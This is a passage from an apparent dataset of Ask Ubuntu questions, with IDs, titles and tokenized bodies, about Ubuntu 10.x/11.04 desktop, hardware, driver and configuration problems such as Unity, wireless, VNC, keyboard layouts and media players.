thinkpad edge , and it was answered but let me remind you i 'm not using the intel version of wireless for my thinkpad but the realtek ( rtl8192svb ) .
41262	way to measure computer usage via screensaver active/not active time ?	i 'm looking for a simple way to determine the rough amount of time per day i spend on a computer . this can be a difficult task if you try to monitor processes , key presses , mouse clicks and the like , because one can be doing anything from thinking about a coding problem , reading a web article , talking on the phone , or gone off walking the dog . the computer can not read my mind . since i leave computers on 24/7 monitoring log-ins wo n't work . i hit on the idea of logging how much time the computer spends in screensaver mode . my error would then be no greater than the product of the idle-time-to-screensaver with the number of times it goes into screensaver mode . subtracting this from 24 hours would give me an estimate which would be reasonable for my purposes . the problem is : i do n't know how to log when the screensaver turns on and off . i am running ubuntu 10.10 at the moment on most machines , about to start upgrading to 11.04 on some of them . any ideas ? [ edit ] after more googling i hit upon the dbus-monitor which looked like it might work , but is missing an important ingredient . here 's the script i am running which launches the monitor as a daemon : # ! /bin/bash running=`ps -a | grep `` dbus-monitor '' ` if [ ! $ running ] ; then echo `` ( re ) starting dbus-monitor daemon '' nohup dbus-monitor `` -- profile '' `` type='signal ' , interface='org.gnome.screensaver ' '' > > $ { home } /sc.log & fi here is the output it produces after locking and unlocking the screen a couple times : sig 1304860712 153829 2 /org/freedesktop/dbus org.freedesktop.dbus nameacquired sig 1304860717 318732 462 /org/gnome/screensaver org.gnome.screensaver activechanged sig 1304860725 547928 463 /org/gnome/screensaver org.gnome.screensaver activechanged sig 1304861018 17 464 /org/gnome/screensaver org.gnome.screensaver activechanged sig 1304862919 403523 466 /org/gnome/screensaver org.gnome.screensaver activechanged the second column is obviously unix utc in seconds . the missing ingredient is it does n't identify whether the screensaver is on or off ! i suppose i could assume they toggle from the time nameacquired happens , but it makes me queasy that there might be a missing or extra event i ca n't anticipate which would throw everything out of sync . much obliged for ideas . jkcunningham
41268	how to install gnome-tweak-tool in gnome shell git ?	does anyone know how to use gnome-tweak-tool with gnome shell built from git ? i installed gnome tweak tool via ppa , but it gives errors while trying to start it ... thanks in advance !
41271	how do i add ubuntu music store to rhythmbox ?	i 've checked in the plugins and i ca n't seem to get the ubuntu one music store in rhythmbox . i 'm not a fan of banshee fyi . all help greatly appreciated .
41273	how to copy/paste text from remote system ?	i used to access a remote system via vnc viewer , but when i copy some text from the remote system and paste it in my text editor ( local system ) , nothing happens . do i need to install any additional packages to achieve this task ? updates : there is no such option found in the real vnc properties . i just get the following output : karthick @ karthick : ~ $ vncconfig no vnc extension on display :0.0 updated : karthick @ karthick : ~ $ vncserver warning : karthick:1 is taken because of /tmp/.x1-lock remove this file if there is no x server karthick:1 warning : karthick:2 is taken because of /tmp/.x2-lock remove this file if there is no x server karthick:2 new 'x ' desktop is karthick:4 starting applications specified in /home/karthick/.vnc/xstartup log file is /home/karthick/.vnc/karthick:4.log karthick @ karthick : ~ $ vncconfig -display :1 vncconfig : unable to open display `` :1 ''
41276	is there any webcam finger tracking software available ?	i have been looking all over the place for finger tracking software for my webcam that i have built in to my laptop ( for example , when you move your finger around and your mouse follows your finger where ever it goes ) thanks for the help if you can find something like that .
41277	last.fm indicator/notification support	is it possible to enable indicator/notification support for the lastfm client ? is there a plug-in or ppa for this ? if not , is this support being worked on ? as an aside , is the lastfm client open-source ... can the community work on this ?
41280	11.04 : no systray ?	does ubuntu 11.04 ( unity ) not have a systray ? i have set show system tray icon to always in pidgin 's preferences , but nothing shows up . and it seems i ca n't add anything to the panel ( is it even a gnome panel anymore ? ) -- otherwise i would have been able to add the systray applet myself .
41286	when ever update manager does an update , my appearance settings change	using 11.04 . when ever update manger does updates ( have done 2 since install ) , when i log back in the appearance setting change from the default ambiance settings to radiance . i have to manually change back to ambiance , log out , log back in for it to keep the settings . is ambiance the default setting for 11.04 ?
41287	why is the data transfer rate so slow on my external usb 2.0 drive ?	my external 1tb hard drive is connected to the front usb2.0 socket on my 11.04 box . when copying files i have a very slow data transfer rate rate of approx . 12 mb/sec maximum even though from the hard disk utility it says it is connected at high-speed usb ( 480 mb/s ) : this the output of lsusb : bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 002 : id 046a:010a cherry gmbh bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 002 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 001 device 008 : id 1058:1001 western digital technologies , inc . external hard disk [ elements ] bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub this is the output of hdparm : ~ $ sudo hdparm -tt /dev/sdc1 /dev/sdc1 : timing cached reads : 1904 mb in 2.00 seconds = 952.06 mb/sec timing buffered disk reads : 96 mb in 3.06 seconds = 31.35 mb/sec with this rate it takes hours to backup my frequently edited large video files . this it makes it almost unusuable , even more so because i know it could perform much better . changing the usb port to another one on the back of the computer and changing the cable to a brand new one did not make any change . is there any setting i need to make in addition to defaults of my still quite vanilla but update 11.04 here ?
41289	how do i make the 'beep ' command work ?	i am trying to use the beep command , but it does n't beep any sound . i installed it with `` sudo apt-get install beep '' , then i run `` beep '' and nothing happen ( no error displayed or sound played ) . i 've also ran sudo modprobe pcspkr , and sudo alsamixer , unmuted `` beep '' and put the db gain to 100 . and sudo alsactl store after that . is there a way to fix it or an alternative to `` beep '' ? i am using ubuntu 10.04 .
41290	how to make update manager stop nagging about a new release ?	i do n't want to upgrade to the new release , and i do n't want to have the notification icon about the upgrade ( red triangle with exclamation mark in it ) sit on the tray constantly .
41297	is there any way to integrate dropbox in the messaging menu like ubuntu one ?	well , what the title says : is there any way to integrate dropbox in the messaging menu like ubuntu one ? edit : below is an image showing where ubuntu one is on the messaging menu that is where i ask if i can put dropbox , not on the panel itself .
41302	how to connect usb monitor ?	i have a mimo monitor and it runs usb . i tried and failed and i do n't know what to do ... ... all i get from the usb screen is just a green screen . anyone could help me ?
41303	system boots to a black screen after upgrade to 11.04	i was a similar situation to this user : dual boot 10.10 and 11.04 ca n't boot into 10.10 after an update . only many more grub entres . natty still worked - and i could still access the natty partition , until i ran sudo apt-get dist-upgrade to install a kernel update . now trying to boot natty gives me a black screen . booting into the same kernel in 'recovery mode ' gets me a little further : plymouth appears and pressing any key shows me that it 's stuck at 'cups printing ... ok ' .
41306	how do i use the old clock applet ?	the natty indicator-datetime widget is a huge downgrade . it does n't show a visual indication of time-of-day on the alternate timezones ; it does n't show my upcoming appointments ; and it requires me to enter my password just to switch timezones ( ! ! ! ) . how do i go back to the mature , feature-full date/time/calendar applet i had in maverick ?
41307	want to install windows 7 on separate drive	i have a two hard drive system with a vista disk that wo n't boot , and ubuntu 10.04 on the other drive . i 've tried to restore vista with a bootable repair disk , but i get an error saying drivers are missing . i downloaded drivers from the gateway site , but none of them appear to work . after spending the last two days trying to restore vista , i 'm thinking i might as well install win 7 , after i copy all my personal files from the vista drive . vista drive is still accessible from the ubuntu side that boots just fine ( got ta love linux ) . my bios boot order is cd as # 1 , ubuntu ( currently sdb ) # 2 , then vista ( currently sda , this disk unable to boot ) . grub2 is on sdb # 2 . and on sda - i think , that 's what the original config was - bestbuy guys did it . but i installed grub2 on sdb yesterday , and changed the boot order . will i just be able to pop in the win7 install disk , and point it to the correct drive , or is it more complicated than that ? i 'd prefer not to mess with detaching cables inside the machine if i can . thanks .
41312	sound does n't work in unity , but does in ubuntu classic	i recently updated to 11.04 , and it seems rhythmbox broke for me in the update , as well as the new default , banshee . when i try to play a song , the play button changes to a pause button , but nothing plays and the scrollbar detailing the current time of the song does n't move . it might be a problem with the streamer , but i 'm not sure . has this happened to anyone else ? i 've found that it 's not just them banshee and rhythmbox , no sound works . also , it only stops working with unity on -- it works fine with ubuntu classic .
41313	how do i fix the plymouth bootscreen when using proprietary graphics drivers ?	i was trying to fix the boot loader because it was showing the processes as i shut down my laptop as well as fix the problem of the ubuntu logo with the loading dots because it was off center and usually in a very small font size . so i followed these steps on a post on omg ubuntu and now things are completely screwed up . not only is it still doing the same thing on shut down but it switched my entire settings in unity . so what i 'm asking is how do i restore things back to before i installed the `` fix ? ''
41325	add custom icons to the launcher in ubuntu 11.04	i have installed 11.04 i want to know whether i can add custom icons on launcher or not
41329	how can i stop libreoffice from randomly crashing ?	libreoffice keeps on crashing randomly . it will do this when i am typing and when i am switching desktops or anything . there is no patter to it . i need some help here . anyone had this problem or problem similar to it ? anyone have found a fix . also it seems to happen especially prominently after my screensaver has started . i would say it happens about 97 % of the time after that . this is an annoying bug and is keeping my productivity low .
41330	let xorg listen on tcp , but only to localhost ?	i have some x client program which needs access to an x server . it is only able to access the x server by tcp , not by other methods like unix domain sockets . it will run on the same host as the server , to make things easy . so , how can i make my xorg server to listen on tcp port 6000 , but only for connections from localhost ? i found how to make x.org listen to remote connections on port 6000 ? , which explains how to enable access for remote hosts , but i do n't really want remote access ( for security reasons , mainly ) . i thought about somehow forwarding the default transport to tcp , but i did n't really find information about what the default transport is . ( i 'm using kdm as my display manager here , but i think i can transfer solutions for either display manager , or even switch the display manager . ) any ideas ? this is on 11.04 on a mixed kubuntu-ubuntu-xubuntu installation ( originally kubuntu , but i added ubuntu-desktop and xubuntu-desktop . on boot it is now saying xubuntu 11.04 ) . i 'm now using the gnome-classic desktop , i think , from kdm .
41332	how do i check if i have a 32-bit or a 64-bit os ?	i downloaded and installed the latest 11.04 version from the official ubuntu site . however i do n't know if it installed the 32-bit or 64-bit version . in windows 7 i could right click my pc and there the information was on display . any easy ways in ubuntu ?
41337	how do i remove icons from the unity launcher using a script ?	after a fresh install of 11.04 i have a script that does a few useful things . is there a way to remove the libreoffice , ubuntu one etc icons from the unity launcher using command line so i can put it in my script ?
41338	is there anyway i can stop the panel from showing up when i switch focus to a different application ?	i have a dual monitor setup going . i want to play a video ( using smplayer ) on the second screen while using applications on the first screen . i have it working except for one annoying thing . when ever i switch focus from smplayer to a different application on the other screen the unity panel shows up above the video . is there anyway i can stop the panel from showing up when i switch focus to a different application ?
41341	can i use thunderbird to access microsoft exchange server ?	can i use thunderbird to access microsoft exchange server ? evolution works ok , i am just looking for an alternative .
41345	switch temporarily to headless mode or runlevel 3 ?	i 've installed ubuntu 10.10 x86_64 desktop version , which defaults to xorg login i want to temporarily switch this machine to server mode , basically i `` suspect '' this entails setting to runlevel 3 and headless mode somewhere what are the details of this ? also very important is how do i re enable desktop mode again ?
41347	inconsistent wlan conection	i have ubuntu 11.04 installed . everything works fine . especially , i am happy that most of the time my computer has wlan connection 10 sec after waking up from sleep . but as i said most of the time . does anybody have an idea why the behavior is not consistent ? my wireless card is a broadcomcard
41348	why can the volume go higher than 100 % ?	how come the maximum volume on the sound menu is n't actually the maximum volume possible ? if i select `` sound preferences ... '' and look at the volume slider in the window , it can go quite a bit higher . why is this and what is the point ? what i do know is that audio can distort past the normal 100 % level in most instances but it 's fine for when i 'm playing dvds .
41350	screen brightness fading options	i am using ubuntu natty on my laptop . while unplugged screen fades out , gets a little bit darker . it is great for the battery . the question is how i can adjust the time before the fades out . now it is something like 5 seconds . when i read i must hold my finger on the touchpad in order to be not annoying of the brightness shifts every time . 1 or 5 minutes should be better . i looked for it in compiz configuration with no success ... . thank you in advance .
41356	i 'm stuck on user defined session destop environment	i just installed ubuntu for the first time dual boot so i get to choose ubuntu or windows . i then changed the setting where is does n't ask for my password when booting up . i then installed edubuntu desktop package . i then hit system and logged out that way i could be at the loggin screen that also lets you select the desktop environment . edubuntu was not there but user defined session was so i clicked that thinking that might be edubuntu and logged in . now im totally stuck . only walpaper on the screen as i realize now that is normal for user defined session but there is no log out button to change desktop environments now and since i set it to not ask for password at boot up there is no option to change it at start up . if i hit ctrl+alt+del it only lets you shutdown , restart , suspend , or hybernate ... . no logg out . i have hit every key on the keybourd hoping something will pop up . i thought this must be a simple noob mistake that there must be endless artiles about this so did searches on google and forums and was shocked to find nothing about this . my next step unless someone can help is to uninstall and reinstall .
41359	seeing windows files from ubuntu 11.04	i have ubuntu 11.04 on windows 7 , both sit on macbook pro 13 , 5,5 . is it possible to 'see ' windows files ?
41361	why is unity ( compiz ) consuming more and more ram ?	about 3 to 4 hours after turning on my pc , compiz 'memory usage ' rose from 300mb up to 1.5gb ! what is happening ? what is wrong ? here is the screen-shot from system monitor :
41362	ubuntu 10.10 rhythbox and ipod touch problem	hey i have another ipod/rhythmbox question . i can mount my ipod and see it 's contents just fine . i was able to sync and manipulate its contents , so thats all good . what 's weird is , i purchased a bunch of music on the ipod though itunes , but the newly purchased music does not show up in rhythmbox . it 's as rhythbox wont resync the contents of the ipod . running ubuntu 10.10 any ideas ?
41363	how to disable visual effects and compiz 100 %	update 1 : the problem is not a monitor refresh rate flickering problem , as then the whole screen would be flickering . for me , only the application windows flicker in and out of view , then most of the time , when there do decide to show themselves , they only partly show themselves , like just top half , bottom half , left half , corner missing , window disappears when you try moving it or mouse over it even etc etc . i know it is a visual effect problem as i know my computer can not handle visual effects and for some reason when the windows do appear partly , i can see the shadows behind the windows . those shadows are part of the visual effects which are turned on by default for some reason . i get the same problem with 10.04 , but can quickly turn off the visual effects by right clicking the desktop , selecting change background image , and in the visual effects tab , i can click on none , which stops all the visual problems . original question : i am having problems with 11.04 on my computer . for some reason it is enabling visual effects by default in the live cd when it should not be as my computer can not support such effects . my computer can not support unity either , but it defaults to standard gnome with visual effects for some reason . it should be defaulting to standard gnome with no visual effects . therefore , all i get is a very flickery live cd which makes it very difficult to see anything . so my question is , how do i disable the visual effects from the live cd ? to put it simply , the live cd flickering is so bad , that i had to log back into my standard 10.04 install just to write this question , as i just could n't see enough of the screen because of the flickering in 11.04 to even get to askubuntu.com ...
41364	backing up /home/user	i was thinking whether it is a good idea to backup of all directories starting with dot in my home folder , so that all settings can be restored if anything goes wrong . i just had an instance when i had to clear the home folder as ubuntu was not logging in . as my home folder is huge , i do n't want to backup the entire thing . how can i backup just the .folders . will there be any permission issue when i restore . is this a good backup option .
41365	glitch in system : `` kernel panic ; fatal exception in interrupt ''	i 've been having a problem since i installed natty . every couple of days , when performing mundane tasks like opening a new browser window or starting a program , the screen will suddenly go blank and show a text module . ( command prompt/terminal ? newbie alert . ) when this happens , i have to do a hard reboot , which is obviously not good when i 'm working on things , and i ca n't even move the mouse . i 'm only a rookie when it comes to the inner workings of computers , and am still a relatively new user of ubuntu , so i 'm not entirely sure what it was saying , and i could n't get a good picture of the computer screen , so i copied down a few of the lines that seemed to possibly be indicative of the problem : kernal panic - not syncing : fatal exception in interrupt panic occurred , switching back to text console bug : scheduling while atomic : chrome/1606/0x00000100 do n't know how common this is or if it 's a glitch solely in my system , but any help with explaining it / telling how to resolve the problem , if possible , would be greatly appreciated . thanks !
41374	ca n't open file browser ?	i am using ubuntu 11.04 with gnome3 . it was working fine however after doing a dist-update i am unable to open the file browser . i click the icon/find it in search and click it . and the menu closes but nothing opens . i can search for `` downloads '' and it shows up under places , i can launch it fine using that . what am i doing wrong ?
41376	checklist for upgrading a very out of date install	background : my last upgrade was from 9.04 to 9.10 , and it did not go well . i lost a lot of my settings and spent way too much time reinstalling packages that i though i already had . last april , i was very busy and did n't feel like spending all my time restoring the settings on my system again . by this time i 'd installed by hand some newer versions of software that where not on 9.10 ( ruby 1.9.2 , mongodb , haskell 7.03 for example ) . by the time life settled down it was september and i though i 'll just wait for 10.10 ... you see where this is going . question : i have a lenovo core 2 duo happily running ubuntu 9.10 32-bit . i would like to upgrade to 11.04 ( 64-bit if it is possible ) . what do i need to do to make this as smooth a transition as possible ? an ideal answer would be a checklist with links to askubuntu question that describe how to do that step .
41380	dual monitor results in 'greyed ' windows	this occurs in maverick and natty . single screen is fine , mirror of single screen is fine . if the mirror box is unchecked and the second monitor is turned on to extend the desktop then all windows are greyed out ( like they do when a process has timed out and is unresponsive ) and pop up menus are greyed out but icons , panels and background are fine and the windows do operate ( just ca n't see them well enough to use ) i have a d620 with intel graphics . this machine did work with dual monitors at some time in the past , however i have been using another machine , a d630 with nvidia and it works fine . yes , there have been any number of updates . i also upgraded from maverick to natty to see if it would go away . no joy . also , the d620 has a dual boot windows system and the windows xp system works fine with daul monitors there is a forum thread that goes into more detail and there are a number of users experiencing this problem . thread : greyed out windows thanks for reading paula_ke
41385	can not calibrate touchscreen	i installed 11.04 on a wetab ( although wetab os is now gonne , only 11.04 now ) . i use the egalax inc. usb touchcontroller device driver . i want to calibrate the screen using touchscreen settings , but i get the following errir message : '' unable to start calibration . exclusive access to the pointer could not be obtained '' this is annoying because the calibration is slightly wrong , meaning i ca n't reach the right of the screen including shut down/log out etc . is there a fix for this , or a way to manually change the calibration settings ?
41387	why does n't banshee recognize my video mp4 files ?	avi files placed in the video folder show up almost immediately , but for some reason , mp4 's do not . movie player will play the mp4 's , so i do n't think it is a gstreamer situation .
41390	can nautilus use correct lexicographic sort ?	nautilus by default uses some kind of `` natural '' sort order which appears to target a use case like this : photo 1.jpg photo 2.jpg photo 10.jpg i do not want this behavior . i want nautilus to sort consistent with ls . in this example , i want it sorted : photo 1.jpg photo 10.jpg photo 2.jpg can i do this in nautilus ? where is the setting that controls this ?
41392	is it possible to customize a removable drive launcher/quicklist ?	so , i do know that it is fairly easy to customize application shortcuts ( launchers ) by editing the respective .desktop file . but , is it possible to create custom quicklists to the removable drives ' launchers ? e.g . a `` format '' option or `` properties '' would be really useful .
41393	windows xp ca n't access ntfs partitions created with gparted	first , i know this may be just an issue with windows , but i guess people on the ubuntu/linux side may know this kind of issue better . i just did a full system reinstall with new partitioning . i first wiped the disk during windows xp install , and gave 20gb to xp , the remaining space unpartitioned . later i installed ubuntu 11.04 and did some more partitioning : 145 gb unpartitioned ( it had no ntfs support during installation ) , 15gb for root , 64gb for /home and 5gb for swap ( all of these are an extended partition . under ubuntu , used disk utility to format the 145gb as two ntfs partitions . everything is nice on the linux side , and i keep both ntfs partitions as shared data location . i just went back to windows to try some stuff , and found out that it does not see the two ntfs partitions at all . i found post of people with similar issue , but they have no `` solution '' . what can i do to make xp `` see '' my partitions ? is it some compatibility issue ? thanks ! edit : ok , i guess i found the reason . the ntfs partitions on disk utility say `` type : ntfs '' , but `` partition type : linux ( 0x83 ) '' . edit partition button let me change the type , which i suppose should be `` hpfs/ntfs ( 0x07 ) '' . i tried to change it , but then i get a spinning progress bar indicator that never disappears . i tried it also with unmounted partition and with sudo , but it never finishes the job . every time i tried something i had to restart the system , but at least my partition is ok and usable ( or so it seems ) . so , if this is the culprit , how can i fix this partition type ? thanks again !
41397	external usb hard drives - what speeds should be expected ?	given the number of questions ive seen about slow usb transfer speeds i have to wonder what speeds should one be expecting for a 'typical ' usb2 and usb3 hard drives ? a side question would be what would be considered a proper way to test these speeds .
41399	can my laptop run unity , and if so , how ?	according to the output below , i ca n't run unity on my laptop . however , what is not clear from searching google and ubuntu forums is whether or not the problems are fixable . can settings be changed to make unity run , or is it just a done deal ? $ /usr/lib/nux/unity_support_test -p opengl vendor string : mesa project opengl renderer string : software rasterizer opengl version string : 2.1 mesa 7.10.2 not software rendered : no not blacklisted : yes glx fbconfig : yes glx texture from pixmap : no gl npot or rect textures : yes gl vertex program : yes gl fragment program : yes gl vertex buffer object : yes gl framebuffer object : yes gl version is 1.4+ : yes unity supported : no
41400	how do i make the script to run automatically when tun0 interface up/down events ?	i use vpn client to connect to my corporate servers . it creates tun0 interface after starting the client . i 've written script which install specific routes point to tun0 interface and rest to use normal wifi connection . so that , only my office related traffic goes via vpn and rest are goes via home internet connection . how do i make the script to run automatically when tun0 interface up/down events ? .
41402	how do i get opencv and firefly mv working ?	i 'm trying to get started with the point grey firefly-mv usb camera in ubuntu . i have followed the instructions from point grey , and got completely black images ( yes , the lens cap is off ) . does anybody have a good idea of how to get up and running with the firefly mv in ubuntu ? any demonstration code would be helpful as well ( display the image feed from the camera in a gui ) . thanks !
41406	how do i tile windows side by side ?	on the site http : //ubuntued.info/como-por-as-janelas-do-ubuntu-lado-a-lado is possible to place the windows side by side with the gnome-do , but this tool does not work in the new ubuntu 11.04 natty narwhal . how do i make this work in the new ubuntu ?
41407	what virtualization software can i use ?	i 've used only vmware on my windows 7 machine , but i 'd like to use something on ubuntu . what software would you recommend to create other linux and windows virtual machines ?
41409	is there an easy way to copy the music from my computer to my mp3 player ?	i mostly use banshee . once i have imported a cd on my computer , it 's not user friendly at all to simply copy it to my creative zen . i get error message ( `` argument can not be found '' ) .
41411	9.04 login screen for 11.04	the best login screen ever was the one for 9.04 , i can best describe it as one text field and you entered in your user name then pushed enter then it asked for your password . was a little more secure locally and the background image for the login screen was also pretty rad . anyone know how to change it ?
41413	how to register downloaded podcast mp3 in banshee ?	i just upgraded to natty and trying to start using banshee instead of rythmbox . i noticed that banshee put downloaded podcost under podcast folder . i have a bunch of previously downloaded podcasts by rythmbox which i would like to keep . i can move those files easily into podcast folder for banshee , but how can i associated those file to banshee so banshee recognized it as downloaded podcast ? i do n't mind going down to nitty gritty changing config/meta file or database update if banshee use database to store those info .
41416	how do i get the notification icons i want in unity ?	i now have unity 2d running on my laptop , and the jury is still out as to whether or not i keep it or go back to gnome . one thing that is throwing me off is that i do n't have the same notification icons in the top panel that i like to have . one is a cpu monitor . my laptop is a little older , so i keep an eye on the cpu usage to know when one process is done and i can start a new one without slowing things down . the other is uim . i switch between japanese and english input , and the uim indicator applet in gnome let me know which input mode i was in . right now , only my dropbox icon has carried over ( i upgraded from 10.10 ) . how do i add/remove indicators in my top panel ? right clicking seems to do nothing .
41418	how do i customize the launcher in unity 2d ?	i want to add/remove items on the launcher . i 'm using unity 2d . of course i looked it up on google , and i saw instructions that said when i have an application open , i can right click on it and a menu option will appear to say i can make the icon permanent . however , when i right click on the icon for an open application , all i see is an option to close the application , nothing else . also , right clicking on any of the permanently available default icons does nothing . i want to remove some , for example the software center icon . how do i customize launcher in unity 2d ?
41421	multiple keyboards with different layouts	i have ubuntu ( 11.04 ) running on a recent macbook pro . i use both the built in keyboard and an external keyboard . i want to remap capslock on both keyboards to super , and i want to swap left-alt ( mac option ) and left-super ( mac cmd ) on the built in ( apple ) keyboard only . xmodmap ca n't configure multiple keyboards differently , so thats out . i am able to do this from the cli via setkbmap . here is the script i 'm using : # ! /bin/sh # set caps to super setxkbmap -option caps : super # swap command and option for apple keyboard setxkbmap -device `xinput list | grep -o -p 'apple internal keyboard / trackpad\s+id=\d+ ' | grep -o -p '\d+'` -option altwin : swap_lalt_lwin if i have to , i can run this as a startup application , but i would really like to know if there is a configuration file i can add these settings to instead . it looks like i should be able to add an option ( xkboptions ) to the inputdevice section of my xorg.conf , but when i tried this , the settings had no affect ( perhaps gnome overrides the x settings ? ) . i also tried adding a new inputclass to xorg.conf but that did n't work either . what is the correct place to configure multiple keyboards with different key bindings ?
41430	permanently convert tabs to spaces in vi / vim	if i wanted to have traditional indentation in vi / vim , i would enter these commands : : set tabstop=4 : set shiftwidth=4 : set expandtab it is tedious to type those commands every time i open a file . how do i permanently store those settings ?
41431	what file for setting default keyboard layout	i set the wrong keyboard layout while installing ubuntu and now it reverts back to english every time i reboot . i heard this is normal behaviour , but i want to change the default layout from english the german . i found that i have to edit etc/x11/xorg.conf , but that file does not exist on 11.04 . can someone guide me to the file that initiates this ?
41437	xdmx with wayland is possible ?	i love xdmx for multiple displays but the wayland seems not to provide that distributed multi-head function . ubuntu also wo n't support xdmx on x ?
41440	connman not detecting already existing wireless network	old title : wireless connected , but no internet until i re-add network every time i boot my laptop , it does n't connect to internet . although upon boot it does say `` connected to `` , but when i try to browse any webpage , it does n't load . so everytime upon boot , i have to go to the network manager - > remove the wireless network - > then again add the wireless network , to find that internet is connected finally . i also use my desktop , which with the same settings , does get connected to the internet without any issues . please note that i am connected to the broadband modem via a wireless router and the wireless network ssid is hidden for presumably higher security . please help to solve this issue . edit 1 : i have now unchecked the hidden option of the ssid to make it a broadcast ssid . so its 's no longer hidden now . but still the problem persists . edit 2 : in search of a solution , i have now started using the indicator-network applet , which has installed connman . now the problem is everytime upon boot/reboot , i have to type in the wireless network name and security from the others option and press connect . then it gets connected . it would be very helpful , if connman can automatically detect my already added wireless network . does anyone help me with a suggestion on how this can be done ?
41451	is there a way to make spread mode/expose/super + w highlight the current window ?	when i press super + w in unity i get a nice expose type display of the currently open applications . i can then use the cursor/arrow keys to choose a window and hit enter to select it . the problem is that it is difficult to tell just what you have selected . there is no highlighting of the current window thumbnail . when pressing the alt + tab there is a border that appears to clearly show the active one . is it possible to some how have a highlight of some kind on the spread mode screen ?
41453	can workspace switching ctrl + alt + arrows be changed ?	can the workspace switcher be changed so that it works like it used to in 10 ? when switching workspaces in unity you need to use both the horizontal arrow keys , but if you want to get to workspace 3 and 4 then you must use the vertical arrow keys . this is annoying . can i change it so that i can access all workspaces by hitting the horizontal arrow keys only ?
41457	evolution mail notification does n't work in the messaging menu	when i receive a mail in evolution ( ubuntu 11.04 natty ) , i do n't get any mail notification about it in the messaging menu ( it still shows for my 3 mails accounts `` inbox : 0 '' ) . i 'd like to know if it 's a bug and it can be fixed or if it 's just me . i used the integrated opera email for years but i like the way evolution is integrated into unity .
41466	booting with text only on 1920*1200	i have the proprietary ati driver , which breaks plymouth . i would rather see the whole console output on the full resolution of my screen while booting . how can i do that ?
41469	how do i install the drivers for an ati radeon 9100igp integrated motherboard graphic card ?	i have fresh install the ubuntu 11.04 but still unlucky to install appropriate driver for my ati radeon 9100 igp ( built-in graphic card on asus motherboard ) , because of this uinty is not working on my system . system switch me to classic mode . i have tried many method but no success . please help me to resolve the issue .
41470	i can not connect to ubuntu one from my netbook in my office	first sorry but my english is very bad . i have a problem , when i try to connect to ubuntu one , the application says same all time : '' la información no se puede recuperar . ¿puede que su conexión a internet esté caída ? '' `` error en la sincronización de archivos . ( auth failed ( auth_failed ) ) '' i use ubuntu 11.04 , in my office and at home . at home i updated from 9.04 to 11.04 and can connect whithout any problem . in my office i re-installed ubuntu 11.04 and there i can not connect . what does this happen ? can you help me ? thanks !
41472	why does unity 's top panel stop to respond after some time after login ( i.e . grabbing , double and middle clicking on it stops to work )	i tried to report a bug but ubuntu-bug directed me here so here we go : i recently installed natty ( new install with an old /home partition ) and started to use unity ( have not used it before ) . unity works fine for me except the fact that after some time , top panel stops responding to grabbing and double and middle clicking . the time it takes to stop responding varies and i have not been able to figure out what triggers it . global menu works , as well as indicators and launcher , i can acces the top panel with f10 . i am not even sure it is a unity and not a compiz bug . has anyone encoutered this ? have you any idea if something in my configuration might be using it ? right after logon , the panel works as expected .
41473	batch-mode image effects	i 've created a small time-lapse animation film using gphoto2 and ffmpeg . the film would look way better if i could run a gimp effect on all images - say , the cubism effect . is there a convenient way to do this ?
41477	ddebs missing for hardy ?	i 'm trying to debug some crashes on a 8.04 lts server , but the ddebs repository at http : //ddebs.ubuntu.com/dists/ no longer has a directory for hardy ... any ideas where the debug symbols for hardy have moved to ?
41478	how do i install the virtualbox version from oracle to install an extension pack ?	i downloaded virtualbox ose from the ubuntu software center but it seems that that version is limited . i prefer to have the complete version and do n't really care if it 's closed source or not . can i install it via a terminal or do i have to download something from a website ? i do n't know how to install software i download from the web . so far i 've only used the software center .
41480	how do i change my keyboard layout in gnome shell ?	i 've tried going to region and language and adding a layout , even making it the default layout , but for some reason i 'm stuck with my original layout and i ca n't seem to change it . in gnome 2 and in unity , there 's a panel applet that allows you to quickly change between keyboard layouts , but there does n't seem to be one in gnome shell . does anyone know a way to get that applet in the panel ( loading it manually ? ) or at the very least change the keyboard layout via the terminal ?
41482	connecting to other lan computers using their names	i have a lan at home with my desktop and my laptop . ip addresses are allocated dynamically to both , so the ip number keep changing . i try to connect from one to the other using places- > server , and in there if i put the correct ip address i connect without any issues . but if i put the hostname , it does n't recognize . same thing if i try to ping the hostname v/s the ip address . the funny thing is that i can see the hostnames if i go to places- > network . so basically ubuntu has got a way of telling what are the machines connected to the network and what are their names , i wonder how can i exploit this to keep an up-to-date routing table that map the hostname to the correct ip address . ps , both desktop and laptop are running ubuntu . i 'm using version 10.04 and 10.10 thanks
41488	using e-acute but not s-acute ( on keyboard usa international w/ dead keys )	i want to be able to use ' + e to get the letter é but being able to type ' + s to get the sequence 's . default my ubuntu 11.04 came with the keyboard layout `` usa international ( with dead keys ) '' . which creates é and ś . when i set it up to use normal `` usa '' it creates both 'a and 's . from windows ( xp ) ( by using `` united states ( international ) '' ) i 'm used to have some kind of smart combination of both . this is quite essential in my ( dutch ) language where letters like é and ë are quite common . anyone knows how to make that work ?
41489	update installed on netbook.. now sidebar icons have disappeared ! : os	hope someone can help . i am not extremely computer literate and my brother installed ubuntu on my acer net book when my windows crashed irretrievably . i recently ( day before yesterday ) had a box come up saying an update ( i think it was 10 or 11 .something ) i followed the instructions to download and install it and now , all my side bar icons have disappeared . i happened upon an internet connection by chance and have no idea whatsoever how to get them back . this is quite probably a really stupid question and a really easy fix but as i said earlier , i am pretty much a novice , very far from a computer expert ! thanx in advance : o )
